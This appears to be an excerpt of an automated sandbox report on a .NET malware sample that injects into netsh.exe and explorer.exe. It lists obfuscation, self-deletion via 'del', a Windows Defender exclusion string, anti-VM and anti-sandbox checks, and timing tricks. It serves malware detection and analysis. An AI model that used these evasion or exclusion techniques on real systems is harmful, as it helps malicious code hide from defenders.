          Source: Binary string: wntdll.pdb source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: triage_dropped_file.exe, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.triage_dropped_file.exe.ea0000.0.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.triage_dropped_file.exe.ea0000.0.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.triage_dropped_file.exe.9a0000.1.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.2.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.3.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.5.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.9.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.1.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.7.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.0.unpack, Main.cs .Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041F074 push 0000003Ah; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041783E push 5B3B22F0h; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041EA3B push E33F23DFh; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_00416B72 push eax; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041EC07 push 2AB056CEh; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041D4C5 push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041ECC6 push 2AB056CEh; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041654F push esp; iretd
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041D57C push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041D512 push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041D51B push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_00416FF0 push edi; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_0041A785 push esi; iretd
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0328D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099783E push 5B3B22F0h; retf
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099F074 push 0000003Ah; retf
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099EA3B push E33F23DFh; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_00996B72 push eax; retf
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099D4C5 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099ECC6 push 2AB056CEh; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099EC07 push 2AB056CEh; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099D51B push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099D512 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099654F push esp; iretd
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099D57C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0099A785 push esi; iretd
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_00996FF0 push edi; retf
          Source: initial sample Static PE information: section name: .text entropy: 7.82226086578

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\netsh.exe Process created: /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match File source: 0.2.triage_dropped_file.exe.32b9d84.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.triage_dropped_file.exe.323d3bc.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: triage_dropped_file.exe PID: 3428, type: MEMORYSTR
          Source: triage_dropped_file.exe, 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
          Source: triage_dropped_file.exe, 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\triage_dropped_file.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000989904 second address: 000000000098990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000989B7E second address: 0000000000989B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exe TID: 2900 Thread sleep time: -39332s >= -30000s
          Source: C:\Users\user\Desktop\triage_dropped_file.exe TID: 1388 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\netsh.exe API coverage: 7.4 %
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Thread delayed: delay time: 39332
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Thread delayed: delay time: 922337203685477
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000C.00000000.296251998.000000000891C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000000.321089896.0000000003710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
          Source: explorer.exe, 0000000C.00000000.304861001.0000000003767000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000C.00000000.348408544.00000000011B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 0000000C.00000000.313661366.00000000089B5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000C.00000000.321983274.00000000053C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000C.00000000.313661366.00000000089B5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Code function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0323DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03263B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0323DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03308B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0323F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03264BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03305BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03241B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03262397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03274A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03248A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03235210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03235210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0323AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03253A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03308A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0327927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03239240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0324AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03262AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03262ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03254120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03254120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03239100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0323C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0323B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03262990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0323B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0324B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03304015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03301074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03250050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03239080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03234F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0326A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0325F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0330070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0324FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03308F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_0324EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_03248794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 21_2_032737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03268E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03300EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03300EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03300EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03278EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03273D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032E3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03257D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03261DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03261DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03261DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324D5E0 mov eax, dword ptr fs:[00000030h]
